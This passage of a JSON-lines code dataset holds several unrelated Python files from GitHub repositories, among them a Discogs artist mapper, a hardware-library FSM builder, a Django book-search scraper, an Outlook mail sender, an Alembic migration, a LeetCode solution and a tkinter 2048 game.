else:\n            nearArtists = findNearest(artistName, self.getArtists(), num=num, cutoff=cutoff)\n            if debug:\n                print(\"Nearest Matches for: {0}\".format(artistName))\n            for nearArtist in nearArtists:\n                artistIDs[nearArtist] = self.artistNameToID[nearArtist]\n            return artistIDs\n        \n        return artistIDs\n    \n    \n    def getArtistAlbums(self, artistID, flatten=False):\n        if self.albumsDB is None:\n            raise ValueError(\"Artist Albums not set!\")\n        \n        if artistID is None:\n            return {}\n        \n        if self.albumsDB.get(artistID) is None:\n            print(\"# Artist ID [{0}] is not found in Albums DB [{1}]\".format(artistID, self.db))\n            return {}\n        \n        if flatten is True:\n            return self.flattenedArtistAlbums(self.albumsDB[artistID])\n        return self.albumsDB[artistID]\n    \n\n    def flattenedArtistAlbums(self, vals):\n        if vals is None:\n            return []\n        if isinstance(vals, dict):\n            albums = []\n            for k,v in vals.items():\n                if isinstance(v, dict):\n                    for k2, v2 in v.items():\n                        albums.append(v2)\n                elif isinstance(v, list):\n                    for v2 in v:\n                        albums.append(v2)\n                else:\n                    raise ValueError(\"Need either a dict or list in flattenedArtistAlbums()\")\n            return list(set(albums))\n        if isinstance(vals, list):\n            albums = []\n            for v in vals:\n                if isinstance(v, list):\n                    for v2 in v:\n                        albums.append(v2)\n                else:\n                    raise ValueError(\"Need a list in flattenedArtistAlbums()\")\n            return list(set(albums))\n        return []\n\n    \n    \n    ########################################################################################################\n    #\n    # Summarize Artist Data\n    #\n    ########################################################################################################\n    def getArtists(self):\n        return self.artists\n    \n    def getNartistIDs(self):\n        return len(self.artistIDToName)\n\n    def getNartistNames(self):\n        return len(self.artistNameToID)\n    \n    def getNalbums(self):\n        try:\n            nAlbums = sum([[len(v2) for v2 in v.values()][0] for k,v in self.albumsDB.items()])\n        except:\n            nAlbums = 0\n        return nAlbums\n    \n    \n    \n    def summary(self):\n        print(\"Summary 
Statistics For DB: {0}\".format(self.db))\n print(\" Using Known Artists: {0}\".format(self.known))\n print(\" Found {0} ID -> Name entries\".format(self.getNartistIDs()))\n print(\" Found {0} Name -> ID entries\".format(self.getNartistNames()))\n print(\" Found {0} Albums\".format(self.getNalbums()))","repo_name":"tgadf/discogs","sub_path":"dbArtistMap.py","file_name":"dbArtistMap.py","file_ext":"py","file_size_in_byte":9344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"17408812225","text":"from typing import Tuple, Dict, Set, List\n\nfrom hwt.pyUtils.arrayQuery import iter_with_last\nfrom hwtLib.abstract.frame_utils.join.state_trans_info import StateTransInfo\nfrom hwtLib.abstract.frame_utils.join.state_trans_item import StateTransItem\nfrom hwtLib.abstract.frame_utils.join.state_trans_table import StateTransTable\nfrom hwtLib.abstract.frame_utils.join.input_reg_val import InputRegInputVal\nfrom copy import deepcopy\n\n\ndef is_from_different_input(a: Tuple[int, int, int, int],\n b: Tuple[int, int, int, int],\n ):\n return a is None \\\n or b is None \\\n or a[0] != b[0]\n\n\ndef is_next_byte_from_same_input(a: Tuple[int, int, int, int],\n b: Tuple[int, int, int, int],\n ):\n return not is_from_different_input(a, b) and a[2] == (b[2] - 1)\n\n\ndef input_B_dst_to_fsm(word_bytes: int,\n input_cnt: int,\n input_B_dst: List[List[Set[\n Tuple[Tuple[int, int], int, int, int]\n ]]],\n can_be_zero_len_frame: List[bool]):\n \"\"\"\n :param word_bytes: number of bytes in output word\n :param input_cnt: number of input streams\n :param input_B_dst: list with mapping of input bytes to a output bytes in each state\n\n .. code-block::\n\n Format of input_B_dst is: List for each input\n in this list there are lists for each input byte\n in this list there are sets of byte destinations for each input byte\n byte destination is a tuple:\n state label, input index, time index, output byte index, input last flag\n\n :note: input_B_dst is produced by :func:`hwtLib.amba.axis_comp.frame_utils.join.FrameJoinUtils.resolve_input_bytes_destinations`\n \"\"\"\n # (out_frame_format_i, out_word_i): StateTransInfo\n sub_states: Dict[Tuple[int, int], StateTransInfo] = {}\n # create substates from input byte mux info\n for in_i, in_word_dst in enumerate(input_B_dst):\n for in_B_i, in_B_dsts in enumerate(in_word_dst):\n for (st_label,\n in_B_time,\n out_B_i,\n B_from_last_input_word) in in_B_dsts:\n st_label: Tuple[int, int]\n st = sub_states.get(st_label, None)\n if st is None:\n st = StateTransInfo(st_label, word_bytes, input_cnt)\n sub_states[st_label] = st\n st.set_output(out_B_i, in_i, in_B_time,\n in_B_i, B_from_last_input_word)\n\n # resolve max lookahead for each input\n max_lookahead_for_input: List[int] = [0 for _ in range(input_cnt)]\n for in_i, in_word_dst in enumerate(input_B_dst):\n for in_B_i, in_B_dsts in enumerate(in_word_dst):\n for st_label, in_B_time, out_B_i, _ in in_B_dsts:\n max_lookahead_for_input[in_i] = max(\n max_lookahead_for_input[in_i], in_B_time)\n\n # build fsm\n state_cnt = input_cnt\n tt = StateTransTable(\n word_bytes, max_lookahead_for_input, state_cnt)\n states_for_relict_processing: List[StateTransInfo] = []\n # for all possible in/out configurations\n for ss in sorted(sub_states.values(), key=lambda x: x.label):\n ss: StateTransInfo\n st_i = ss.get_state_i()\n next_ss = ss.get_next_substate(sub_states)\n if next_ss is None:\n next_st_i = 0\n else:\n next_st_i = next_ss.get_state_i()\n\n tr = StateTransItem(tt, st_i, 
next_st_i, int(next_ss is None))\n tt.state_trans[st_i].append(tr)\n o_prev = None\n for last, (out_B_i, o) in iter_with_last(enumerate(ss.outputs)):\n if o is None:\n o_prev = o\n # output byte is disconnected, which is default state\n continue\n # in_i - input stream index\n # in_t - input time (register index)\n (in_i, in_t, in_B_i, is_from_last_input_word) = o\n in_rec: InputRegInputVal = tr.input[in_i][in_t]\n # vld, keep required as we are planing to use this byte in output\n in_rec.keep[in_B_i] = 1\n in_rec.last = is_from_last_input_word\n tr.out_byte_mux_sel[out_B_i] = (in_i, in_t, in_B_i)\n tr.input_rd[in_i] = 1\n # next keep = 0 because this byte will be consumed\n tr.input_keep_mask[in_i][in_t][in_B_i] = 0\n tr.output_keep[out_B_i] = 1\n\n if last:\n o_next = next_ss.outputs[0] if next_ss is not None else None\n else:\n o_next = ss.outputs[out_B_i + 1]\n\n if o_next is not None:\n assert o[0] <= o_next[0]\n\n is_input_word_continuing_in_next_out_word = last \\\n and next_ss is not None \\\n and is_next_byte_from_same_input(o, o_next)\\\n and in_B_i != word_bytes - 1\n\n if is_input_word_continuing_in_next_out_word:\n assert next_ss is not None\n states_for_relict_processing.append(next_ss)\n\n is_first_input_byte = is_from_different_input(o_prev, o)\n # is last byte from input byte in this output word\n is_last_input_byte = is_from_different_input(o, o_next)\n\n if is_last_input_byte:\n assert not is_input_word_continuing_in_next_out_word\n # iterate for all inputs until next input or end (if there are not any) and\n # mark its input keep with 0 and last with 1 to mark for 0B frame input\n next_input_i = input_cnt if o_next is None else o_next[0]\n for skipped_input_i in range(in_i + 1, next_input_i):\n _in_rec: InputRegInputVal = tr.input[skipped_input_i][0]\n _in_rec.last = 1\n _in_rec.keep = [0 for _ in _in_rec.keep]\n _in_rec.relict = 1\n tr.input_rd[skipped_input_i] = 1\n tr.input_keep_mask[skipped_input_i][0] = [0 for _ in range(word_bytes)]\n\n next_input_can_be_zero_len = not is_input_word_continuing_in_next_out_word and\\\n o_next is not None \\\n and can_be_zero_len_frame[next_input_i]\n if next_input_can_be_zero_len:\n # mark that the next_input does not have 0B frame\n # to distinguish between the transitions which are skipping the input\n assert o_next is not None\n (next_in_i, next_in_t, next_in_B_i, _) = o_next\n next_in_rec: InputRegInputVal = tr.input[next_in_i][next_in_t]\n # vld, keep required as we are planing to use this byte in output in the future\n next_in_rec.keep[next_in_B_i] = 1\n\n if is_first_input_byte:\n if in_B_i != 0:\n # mark leading zero\n for i in range(0, in_B_i):\n in_rec.keep[i] = 0\n\n if (is_last_input_byte \\\n or is_input_word_continuing_in_next_out_word\\\n or last) \\\n and (\n not (is_from_last_input_word \\\n and is_last_input_byte \\\n and in_B_i == word_bytes - 1)):\n # mark keep for next input byte\n if not is_from_last_input_word or is_input_word_continuing_in_next_out_word:\n # the next input byte is present because we are not in last input word\n # or this may be a last word but it is not fully consumed\n next_B_keep = 1\n else:\n # no more bytes from this input stream\n next_B_keep = 0\n\n if in_B_i == word_bytes - 1:\n # because pipeline will shift next time\n in_t += 1\n\n input_val = tr.input[in_i]\n if in_t < len(input_val):\n next_keep = input_val[in_t].keep\n next_keep[(in_B_i + 1) % word_bytes] = next_B_keep\n\n o_prev = o\n\n # if we are checking the input keep==0 set keep_mask=0 as well\n # (not required, to make 
clear that the byte will not be used in code)\n for in_meta, in_keep_mask in zip(tr.input, tr.input_keep_mask):\n for in_i, in_inputs in enumerate(in_meta):\n for B_i, k in enumerate(in_inputs.keep):\n if k is not None and k == 0:\n in_keep_mask[in_i][B_i] = 0\n\n # mark relict flag\n first_input_is_relict = ss in states_for_relict_processing\n for o in ss.outputs:\n if o is None:\n # skip start padding\n continue\n\n (in_i, in_t, in_B_i, _) = o\n v = tr.input[in_i][in_t]\n if v.last:\n # relict flag matters only for word with last flag set\n # because it is used to distinguis starts of single word frames\n # where only part of the word can be consumed to a output word\n v.relict = int(first_input_is_relict)\n break\n\n if can_be_zero_len_frame[0]:\n # The previous code generates the transition starting\n # from the state corresponding to a minimal index of input used in it and the starting\n # state is 0, thus all cases where some prefix input was 0B frame now starting in non starting state\n prefix_zero_len_inputs_cnt = 0\n for can_0B in can_be_zero_len_frame:\n if can_0B:\n prefix_zero_len_inputs_cnt += 1\n else:\n break\n\n for orig_st_i in range(1, min(prefix_zero_len_inputs_cnt + 1, input_cnt)):\n for tr in tt.state_trans[orig_st_i]:\n new_tr: StateTransItem = deepcopy(tr)\n new_tr.state = 0\n # wait and consume 0B frames from all inputs where it is expected\n for input_with_0B_i in range(tr.state):\n in_rec: InputRegInputVal = new_tr.input[input_with_0B_i][0]\n in_rec.keep = [0 for _ in range(word_bytes)]\n in_rec.last = 1\n in_rec.relict = 1\n new_tr.input_rd[input_with_0B_i] = 1\n new_tr.input_keep_mask[input_with_0B_i][0] = [0 for _ in range(word_bytes)]\n\n tt.state_trans[0].append(new_tr)\n\n if prefix_zero_len_inputs_cnt == input_cnt:\n # everythin can be 0B frame, we need to add a special transition exactly for that\n # because we did not process it by previous code because it looks only on output bytes\n # and there are not output bytes\n tr = StateTransItem(tt, 0, 0, 1)\n tt.state_trans[0].append(tr)\n for in_recs in tr.input:\n in_rec: InputRegInputVal = in_recs[0]\n in_rec.last = 1\n in_rec.keep = [0 for _ in in_rec.keep]\n in_rec.relict = 1\n\n for skipped_input in tr.input_keep_mask:\n skipped_input[0] = [0 for _ in range(word_bytes)]\n\n tr.last = 1\n tr.input_rd = [1 for _ in tr.input_rd]\n\n tt.filter_unique_state_trans()\n tt.assert_transitions_deterministic()\n return tt\n\n","repo_name":"Nic30/hwtLib","sub_path":"hwtLib/abstract/frame_utils/join/fsm.py","file_name":"fsm.py","file_ext":"py","file_size_in_byte":11542,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"35860396542","text":"from true_project import *\nimport warnings\n\nwarnings.filterwarnings('ignore')\n'''\nwhile True:\n print(\"Введите вопрос: \")\n question = input()\n if question == \"exit\":\n break'''\nanswer = good_answer('президент', df_stack_questions, df_stack_answers, df_quest_ans_mail_ans)\nprint(answer)\nanswer = good_answer('бинарное дерево', df_stack_questions, df_stack_answers, df_quest_ans_mail_ans)\nprint(answer)\nanswer = good_answer(\"вывав\", df_stack_questions, df_stack_answers, df_quest_ans_mail_ans)\nprint(answer)\n\n","repo_name":"Danr0/VKbot","sub_path":"project/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40302173042","text":"import requests\nfrom requests.compat import 
quote_plus\nfrom django.shortcuts import render\nfrom . import models\nfrom bs4 import BeautifulSoup\n\n# Create your views here.\nbase_url='http://gen.lib.rus.ec'\nmain_url=base_url+'/search.php?req={}&open=0&res=50&view=simple&phrase=1&column={}'\ndef home(request):\n return(render(request, 'book_app/home.html'))\n\n\ndef new_search(request):\n try:\n search= request.POST.get('search')\n search_type = request.POST.get('Search_type')\n\n models.Search.objects.create(search=search,type=search_type)\n\n url_f=main_url.format(quote_plus(search),search_type)\n for_front_data,check=get_data_on_book(url_f)\n\n except:\n for_front_data = []\n check = -1\n search=''\n\n checks=str(check)\n data_to_send={\n 'for_front_data':for_front_data,\n 'checks':checks,\n 'search':search,\n }\n return render(request,\"book_app/new_search.html\",data_to_send)\n\n\ndef get_data_on_book(url_f):\n for_front_data = []\n check = 0\n try:\n response = requests.get(url_f)\n page_html = response.text\n\n page_data = BeautifulSoup(page_html, features='html.parser')\n\n post_data = page_data.find_all('tr', {'valign': 'top', 'bgcolor': ('#C6DEFF', '')})\n except:\n return\n\n for post in post_data:\n\n try:\n\n check += 1\n\n ## all the required data from the page in text form ##\n book = post.find_all('td')\n book_id = book[0].text\n book_data = book[2].find('a', {'id': book_id})\n book_author = book[1].find_all('a')\n book_year = book[4].text\n book_lng = book[6].text\n book_size = book[7].text\n book_link = book[9].find('a').get('href', \"\")\n book_formate = book[8].text\n\n picture_url=\"\"\n\n ## go get at max three author name of the book ##\n author = \"\"\n i = 0\n for name in book_author:\n if author != \"\":\n author += \", \"\n author = author + name.text\n i += 1\n if (i == 3):\n break\n\n ## to get titel of the book ##\n ext = book_data.find_all('i')\n ex = \"\"\n p = 0\n for i in ext:\n p = 1\n ex = ex + i.text\n\n book_title = book_data.text\n if p == 1:\n book_name = book_title[:len(book_title) - len(ex) - 1]\n else:\n book_name = book_title\n\n for_front_data.append(\n (book_name,\n author,\n book_lng,\n book_year,\n book_link,\n book_formate,\n picture_url,\n book_size,\n book_id))\n except :\n pass\n\n return((for_front_data,check))","repo_name":"Dhrutiman/my_book","sub_path":"book_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19615621041","text":"#!usr/bin/python3\n#-*-coding:utf-8 -*-\n\nimport win32com.client\nimport time,os\nimport warnings\nimport pythoncom\nimport sys\n\ndef sendmail(sub,body,reciever,addfiles):\n outlook=win32com.client.Dispatch(\"outlook.application\")\n mail=outlook.CreateItem(0)\n mail.To=reciever\n #mail.Subject=sub.decode('utf-8')\n #mail.Body=body.decode('utf-8')\n for item in addfiles:\n mail.Attachments.Add(item)\n mail.Send()\n\nif __name__==\"__main__\":\n sub='outlook python mail test'\n body='my test \\r\\n my python mail'\n reciever=\"ting@XX.com\"\n\n## addfiles=[r\"F:\\移动\",\n## ]\n fpath = r\"F:\\移动\"\n fname_list = os.listdir(fpath)\n addfiles = []\n for item in fname_list:\n addfiles.append(os.path.join(fpath,item))\n print(addfiles)\n sendmail(sub,body,reciever,addfiles)\n print(\"send email success\")\n \n 
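# note: sub and body are passed to sendmail() above, but they are never used there because the mail.Subject and mail.Body lines are commented out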
\n\n\n\n\n\n\n","repo_name":"mu683yue/learn_and_exe_python_upTogit","sub_path":"learnPy/python_test_coding/CS_test/csfile_test/outlook_send_email.py","file_name":"outlook_send_email.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20273880117","text":"\"\"\"empty message\n\nRevision ID: f09275db1589\nRevises: \nCreate Date: 2019-10-11 11:31:29.333280\n\n\"\"\"\nimport sqlalchemy as sa\nimport sqlalchemy_utils\nfrom alembic import op\n\nGENDER = [('man', 'Man'),\n ('woman', 'Woman')]\n\nBUDGET = [('small', '<250$'),\n ('medium', '250$-750$'),\n ('regular', '750$-1500$'),\n ('big', '1500$+')]\n\nTYPE_OF_TRIP = [\n (\"city_break\", \"City break\"),\n (\"work_and_travel\", \"Work&travel\"),\n (\"roadtrip\", \"Roadtrip\"),\n (\"backpacking\", \"Backpacking\"),\n (\"vacations\", \"Vacations\"),\n (\"other\", \"Other\"),\n]\n\nHOUSING = [\n (\"camping\", \"Camping\"),\n (\"airbnb\", \"AirBnB\"),\n (\"couchsurfing\", \"Couchsurfing\"),\n (\"hotels\", \"Hotels\"),\n (\"hostels\", \"Hostels\"),\n (\"other\", \"Other\"),\n]\n\nFOOD = [\n (\"self\", \"Self-cooking\"),\n (\"fastfoods\", \"Fast foods\"),\n (\"bistros\", \"Bistros\"),\n (\"restaurants\", \"Restaurants\"),\n]\n\n# revision identifiers, used by Alembic.\nrevision = 'f09275db1589'\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('profile',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('first_name', sa.String(length=50), nullable=True),\n sa.Column('last_name', sa.String(length=50), nullable=True),\n sa.Column('mobile', sa.String(length=50), nullable=True),\n sa.Column('date_of_birth', sa.Date(), nullable=True),\n sa.Column('country', sa.String(length=200), nullable=True),\n sa.Column('if_english', sa.Boolean(), nullable=True),\n sa.Column('about', sa.String(length=255), nullable=True),\n sa.Column('gender', sqlalchemy_utils.types.choice.ChoiceType(choices=GENDER), nullable=True),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('user',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('email', sa.String(length=50), nullable=True),\n sa.Column('password', sa.String(length=200), nullable=True),\n sa.Column('profile_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['profile_id'], ['profile.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('trip',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('start_date', sa.Date(), nullable=True),\n sa.Column('end_date', sa.Date(), nullable=True),\n sa.Column('trip_title', sa.String(length=100), nullable=True),\n sa.Column('gender', sqlalchemy_utils.types.choice.ChoiceType(choices=GENDER), nullable=True),\n sa.Column('type_of_trip', sqlalchemy_utils.types.choice.ChoiceType(choices=TYPE_OF_TRIP), nullable=True),\n sa.Column('housing', sqlalchemy_utils.types.choice.ChoiceType(choices=HOUSING), nullable=True),\n sa.Column('food', sqlalchemy_utils.types.choice.ChoiceType(choices=FOOD), nullable=True),\n sa.Column('budget', sqlalchemy_utils.types.choice.ChoiceType(choices=BUDGET), nullable=True),\n sa.Column('must_do', sa.String(length=255), nullable=True),\n sa.Column('must_see', sa.String(length=255), nullable=True),\n sa.Column('owner_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['owner_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('activity',\n sa.Column('id', sa.Integer(), 
nullable=False),\n sa.Column('activity_name', sa.String(length=255), nullable=True),\n sa.Column('trip_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['trip_id'], ['trip.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('favourite',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('trip_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['trip_id'], ['trip.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('place',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('place_name', sa.String(length=255), nullable=True),\n sa.Column('trip_id', sa.Integer(), nullable=True),\n sa.ForeignKeyConstraint(['trip_id'], ['trip.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('place')\n op.drop_table('favourite')\n op.drop_table('activity')\n op.drop_table('trip')\n op.drop_table('user')\n op.drop_table('profile')\n # ### end Alembic commands ###\n","repo_name":"ktomaszewska97/TravelBuddy","sub_path":"migrations/versions/f09275db1589_.py","file_name":"f09275db1589_.py","file_ext":"py","file_size_in_byte":4448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29539370063","text":"'''\n\tThe count-and-say sequence is the sequence of integers with the first five terms as following:\n\n\t1. 1\n\t2. 11\n\t3. 21\n\t4. 1211\n\t5. 111221\n\n\t1 is read off as \"one 1\" or 11.\n\t11 is read off as \"two 1s\" or 21.\n\t21 is read off as \"one 2, then one 1\" or 1211.\n\n\tGiven an integer n, generate the nth term of the count-and-say sequence. 
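For n = 4 the expected output is \"1211\".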
\n'''\n\nclass Solution(object):\n def countAndSay(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n \n if n == 1:\n \treturn \"1\"\n new_num = \"\"\n count_iter = 1\n num = \"1\"\n\n while count_iter < n: \n \tindex_i, index_j = 0, 0\n \tcount, new_num = 0, \"\"\n\n \twhile index_j < len(num):\n \t\tif num[index_i] != num[index_j]:\n \t\t\tnew_num += str(count) + str(num[index_i])\n \t\t\tcount = 0\n \t\t\tindex_i = index_j\n \t\telse:\n \t\t\tcount += 1\n \t\t\tindex_j += 1\n\n \tif count > 0:\n \t\tnew_num += str(count) + str(num[index_i])\n \tnum = new_num\n \tcount_iter += 1\n\n return new_num\n\n# Space: O(1)\n# Time: O(N*k) k= length of string","repo_name":"Garvit244/Leetcode","sub_path":"1-100q/38.py","file_name":"38.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","stars":1245,"dataset":"github-code","pt":"48"} +{"seq_id":"32270567271","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nfrom __future__ import absolute_import\n\nfrom django.conf.urls import url\n\nfrom ..views.frontend import *\n\nurlpatterns = [\n # meters management\n url(r'^moje_liczniki$', MetersListView.as_view(), name='meters_list_view'),\n url(r'^usun_licznik/(?P[\\d]+)$', RemoveMeterView.as_view(),\n name='remove_meter'),\n url(r'^dodaj_licznik$', AddMeterView.as_view(), name='add_meter'),\n url(r'^licznik/(?P[\\d]+)$', MeterDataView.as_view(),\n name='meter_data_view'),\n url(r'^ustaw_jako_glowny$', SetMeterAsMainView.as_view(),\n name='set_as_main_view'),\n url(r'^zmien_alias/(?P[\\d]+)$', ChangeMeterAliasView.as_view(),\n name='change_meter_alias_view'),\n\n # alarms\n url(r'^moje_alarmy$', AlarmsListView.as_view(), name='alarms_list_view'),\n url(r'^alarm/(?P[\\d]+)$', AlarmDetailsView.as_view(),\n name='alarm_details_view'),\n url(r'^dodaj_alarm$', AddAlarmView.as_view(), name='add_alarm_view'),\n url(r'^edytuj_alarm/(?P[\\d]+)$', EditAlarmView.as_view(),\n name='edit_alarm_view'),\n url(r'^usun_alarm/(?P[\\d]+)$', DeleteAlarmView.as_view(),\n name='delete_alarm_view'),\n]\n","repo_name":"kamilstalkoper/moj_licznik","sub_path":"app/subapps/meters_management/urls/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":1241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12927019517","text":"from projetoMD.LIB.interface import *\ndef arqExiste(nome):\n try:\n a = open(nome, 'rt')\n a.close()\n except FileNotFoundError:\n return False\n else:\n return True\ndef criarrArquivo(nome):\n try:\n a = open(nome, 'wt+')\n a.close()\n except:\n print('Houve um erro na criação de arquivo')\n else:\n print(f'Arquivo {nome} criado com sucesso')\n\ndef lerArquivo(nome):\n try:\n a = open(nome,'rt', encoding='utf-8')\n\n except:\n print('Erro ao ler o arquivo!')\n else:\n cabeçalho('Definição de conjunto')\n print(a.read())\n","repo_name":"4l1son/interface","sub_path":"LIB/arquivo/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3321190838","text":"\"\"\"\r\n2048 Game Clone\r\nLogan Howard\r\n2021-12-09\r\n\"\"\"\r\n# Imports\r\nimport tkinter as tk\r\nimport random\r\n\r\n# Constants\r\n\r\nBACKGROUND_C = \"#a39489\"\r\nEMPTY_TILE_C = \"#c2b3a9\"\r\n\r\nTILE_C = {\r\n 2: \"#fcefe6\",\r\n 4: \"#f2e8cb\",\r\n 8: \"#c4b791\",\r\n 16: \"#f1d185\",\r\n 32: \"#bfa569\",\r\n 64: \"#f0b7a4\",\r\n 128: \"#568ea6\",\r\n 256: \"#3e687a\",\r\n 512: 
\"#396e85\",\r\n 1024: \"#305f92\",\r\n 2048: \"#f18c8e\"\r\n}\r\n\r\n# Game class for 2048\r\nclass Game(tk.Frame):\r\n \r\n # Constructor\r\n def __init__(self):\r\n tk.Frame.__init__(self)\r\n self.grid()\r\n self.master.title('2048')\r\n # Create a main matrix to hold all tiles\r\n self.main_matrix = tk.Frame(self, bg=BACKGROUND_C, bd=1, width=500, height=500)\r\n self.main_matrix.grid(padx=(20), pady=(60, 20))\r\n\r\n # Bind keys for user input\r\n self.master.bind(\"\", self.move_left)\r\n self.master.bind(\"\", self.move_right)\r\n self.master.bind(\"\", self.move_up)\r\n self.master.bind(\"\", self.move_down)\r\n\r\n # Call methods to create and run game\r\n self.create_game()\r\n self.start_game()\r\n self.mainloop()\r\n\r\n # Function to create the game area (matrix, tiles, score)\r\n def create_game(self):\r\n # Build a matrix and fill it with tiles\r\n self.tiles= []\r\n for i in range(4):\r\n row = []\r\n for j in range(4):\r\n tile = tk.Frame(self.main_matrix, bg=EMPTY_TILE_C, width=100, height=100)\r\n tile.grid(row=i, column=j, padx=1, pady=1) # Place tile on matrix (tiles)\r\n num = tk.Label(self.main_matrix, bg=EMPTY_TILE_C) # Create num label for each tile\r\n num.grid(row=i, column=j) # Place label on tile\r\n data = {\"tile\": tile, \"num\": num} # Use labels to access info for future ref\r\n row.append(data)\r\n self.tiles.append(row)\r\n\r\n # Create score frame\r\n score_header = tk.Frame(self)\r\n score_header.place(relx=0.5, y=30, anchor=\"center\")\r\n tk.Label(score_header, text=\"Score\").grid(row=0)\r\n self.score_label = tk.Label(score_header, text=\"0\")\r\n self.score_label.grid(row=1)\r\n\r\n # Function to start the game \r\n def start_game(self):\r\n # Create an initial start matrix\r\n self.matrix = []\r\n for i in range(4):\r\n self.matrix.append([0] * 4)\r\n\r\n # Randomly choose row & col positions for the starting tiles\r\n row = random.randint(0, 3)\r\n col = random.randint(0, 3)\r\n\r\n # Randomly choose weather to place a 2 or 4 for each starting tile\r\n start_num = random.choice([2, 4])\r\n self.matrix[row][col] = start_num\r\n self.tiles[row][col][\"tile\"].configure(bg=TILE_C[start_num])\r\n self.tiles[row][col][\"num\"].configure(bg=TILE_C[start_num], text=str(start_num))\r\n \r\n # Keep generating tiles while the current tile is not zero\r\n while(self.matrix[row][col] != 0):\r\n row = random.randint(0, 3)\r\n col = random.randint(0, 3)\r\n \r\n # Randomly choose weather to place a 2 or 4 for each starting tile\r\n start_num = random.choice([2, 4])\r\n self.matrix[row][col] = start_num\r\n self.tiles[row][col][\"tile\"].configure(bg=TILE_C[start_num])\r\n self.tiles[row][col][\"num\"].configure(bg=TILE_C[start_num], text=str(start_num))\r\n\r\n # Initialize score\r\n self.score = 0\r\n\r\n # Function to stack\r\n def stack(self):\r\n # Create a new matrix\r\n new_matrix = []\r\n for i in range(4):\r\n new_matrix.append([0] * 4)\r\n\r\n # Perform stack\r\n for i in range(4):\r\n cur = 0\r\n for j in range(4):\r\n if self.matrix[i][j] != 0:\r\n new_matrix[i][cur] = self.matrix[i][j]\r\n cur += 1\r\n self.matrix = new_matrix\r\n\r\n # Function to combine tiles\r\n def combine(self):\r\n for i in range(4):\r\n for j in range(3):\r\n if self.matrix[i][j] != 0 and self.matrix[i][j] == self.matrix[i][j + 1]:\r\n self.matrix[i][j] *= 2\r\n self.matrix[i][j + 1] = 0\r\n self.score += self.matrix[i][j]\r\n\r\n # Function to reverse matrix\r\n def reverse(self):\r\n new_matrix = []\r\n for i in range(4):\r\n new_matrix.append([])\r\n for j in 
range(4):\r\n new_matrix[i].append(self.matrix[i][3 - j])\r\n self.matrix = new_matrix\r\n\r\n # Function to transpose matrix\r\n def transpose(self):\r\n # Create a new matrix\r\n new_matrix = []\r\n for i in range(4):\r\n new_matrix.append([0] * 4)\r\n\r\n # Perform the transpose\r\n for i in range(4):\r\n for j in range(4):\r\n new_matrix[i][j] = self.matrix[j][i]\r\n self.matrix = new_matrix\r\n\r\n # Function to add new tile\r\n def add_tile(self):\r\n # Get random tile pos\r\n row = random.randint(0, 3)\r\n col = random.randint(0, 3)\r\n while(self.matrix[row][col] != 0):\r\n row = random.randint(0, 3)\r\n col = random.randint(0, 3)\r\n self.matrix[row][col] = random.choice([2, 4])\r\n\r\n # Function to update game state\r\n def update_game(self):\r\n # Loop through all tiles in matrix\r\n for i in range(4):\r\n for j in range(4):\r\n cur = self.matrix[i][j]\r\n # Check current tiles value\r\n if cur == 0:\r\n # Update current tile data\r\n self.tiles[i][j][\"tile\"].configure(bg=EMPTY_TILE_C)\r\n self.tiles[i][j][\"num\"].configure(bg=EMPTY_TILE_C, text=\"\")\r\n else: # Otherwise determine its value and update tile data accordingly\r\n self.tiles[i][j][\"tile\"].configure(bg=TILE_C[cur])\r\n self.tiles[i][j][\"num\"].configure(bg=TILE_C[cur], text=str(cur))\r\n self.score_label.configure(text=self.score) # Update score\r\n self.update_idletasks()\r\n\r\n \r\n def move_left(self, key):\r\n # Manipulate matrix to move left\r\n self.stack()\r\n self.combine()\r\n self.stack()\r\n\r\n # Add tile, update game, check game state\r\n self.add_tile()\r\n self.update_game()\r\n self.game_state()\r\n\r\n\r\n def move_right(self, key):\r\n # Manipulate matrix to move right\r\n self.reverse()\r\n self.stack()\r\n self.combine()\r\n self.stack()\r\n self.reverse()\r\n \r\n # Add tile, update game, check game state\r\n self.add_tile()\r\n 